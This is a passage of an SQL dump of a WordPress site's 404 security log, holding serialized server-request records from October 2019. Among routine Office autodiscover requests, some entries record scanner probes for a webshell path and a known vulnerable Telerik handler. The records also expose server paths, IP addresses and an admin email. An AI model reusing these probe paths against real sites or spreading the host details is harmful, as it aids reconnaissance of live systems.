20:28:59',35537320,37336632,'https://bintara.com.my/?p=167',1,0,'46.229.168.143'),(27448,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:45:\"/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3451.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:43:\"page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.245.95.206\";s:11:\"REMOTE_PORT\";s:5:\"63169\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZUi@YJZn5yB3iat-ON0JgAAAZc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570054905.175\";s:12:\"REQUEST_TIME\";s:10:\"1570054905\";}}','notice','2019-10-02 22:21:48','2019-10-02 22:21:45',35540408,37345144,'https://bintara.com.my/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2',1,0,'157.245.95.206'),(27449,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/wp-content/wp-content.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/wp-content.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/wp-content/wp-content.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZUzxfPAUZ@EikAaJdWu@wAAAdQ\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/wp-content.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/wp-content/wp-content.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZUzxfPAUZ@EikAaJdWu@wAAAdQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/wp-content.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/wp-content/wp-content.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZUzxfPAUZ@EikAaJdWu@wAAAdQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"69.163.163.120\";s:11:\"REMOTE_PORT\";s:5:\"55018\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/wp-content.php\";s:10:\"SCRIPT_URL\";s:26:\"/wp-content/wp-content.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZUzxfPAUZ@EikAaJdWu@wAAAdQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570059205.2351\";s:12:\"REQUEST_TIME\";s:10:\"1570059205\";}}','notice','2019-10-02 23:33:29','2019-10-02 23:33:25',35595304,37397616,'https://bintara.com.my/wp-content/wp-content.php',1,0,'69.163.163.120'),(27451,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"2593B524-62A3-473E-A3D2-ED740C48A907\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZVAbIJZn5yB3iat-ON5lAAAAZA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.198\";s:11:\"REMOTE_PORT\";s:5:\"58227\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZVAbIJZn5yB3iat-ON5lAAAAZA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570062444.4721\";s:12:\"REQUEST_TIME\";s:10:\"1570062444\";}}','notice','2019-10-03 00:27:27','2019-10-03 00:27:24',35905144,37700560,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.145.63.198'),(27452,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 JuziBrowser\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"103.103.124.233\";s:11:\"REMOTE_PORT\";s:5:\"59269\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZVCOzL-8UHe5oPGfv6EiwAAAE0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570062907.9589\";s:12:\"REQUEST_TIME\";s:10:\"1570062907\";}}','notice','2019-10-03 00:35:12','2019-10-03 00:35:08',35540320,37349048,'https://bintara.com.my/?page_id=18',1,0,'103.103.124.233'),(27453,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"394-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"324EB7B4-2CBB-40AA-A067-946CB6474E96\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"394-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZVJdoJZn5yB3iat-ON7jAAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.198\";s:11:\"REMOTE_PORT\";s:5:\"49805\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZVJdoJZn5yB3iat-ON7jAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570064758.486\";s:12:\"REQUEST_TIME\";s:10:\"1570064758\";}}','notice','2019-10-03 01:06:00','2019-10-03 01:05:58',35522272,37324360,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.145.63.198'),(27454,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:58:\"/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.18.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:80:\"https://bintara.com.my/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:58:\"/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZVXWxsfiPO@JcLkT9hragAAAQE\";s:19:\"REDIRECT_SCRIPT_URI\";s:80:\"https://bintara.com.my/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:58:\"/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZVXWxsfiPO@JcLkT9hragAAAQE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"158.69.237.205\";s:11:\"REMOTE_PORT\";s:5:\"56601\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:80:\"https://bintara.com.my/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx\";s:10:\"SCRIPT_URL\";s:58:\"/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZVXWxsfiPO@JcLkT9hragAAAQE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570068315.3139\";s:12:\"REQUEST_TIME\";s:10:\"1570068315\";}}','notice','2019-10-03 02:05:17','2019-10-03 02:05:16',35192528,36996168,'https://bintara.com.my/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx',1,0,'158.69.237.205'),(27455,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"9F4227EE-C777-45B7-AF99-20D6A4C274B2\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZVh5IJZn5yB3iat-OOEvAAAAY0\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.198\";s:11:\"REMOTE_PORT\";s:5:\"51823\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZVh5IJZn5yB3iat-OOEvAAAAY0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570071012.4149\";s:12:\"REQUEST_TIME\";s:10:\"1570071012\";}}','notice','2019-10-03 02:50:15','2019-10-03 02:50:13',35513000,37313688,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.145.63.198'),(27457,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"B8815E5A-857B-4E47-AB99-F3DAD4D89A20\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZV4@cZsWtvRB7UEo4-J-wAAABc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.198\";s:11:\"REMOTE_PORT\";s:5:\"64711\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\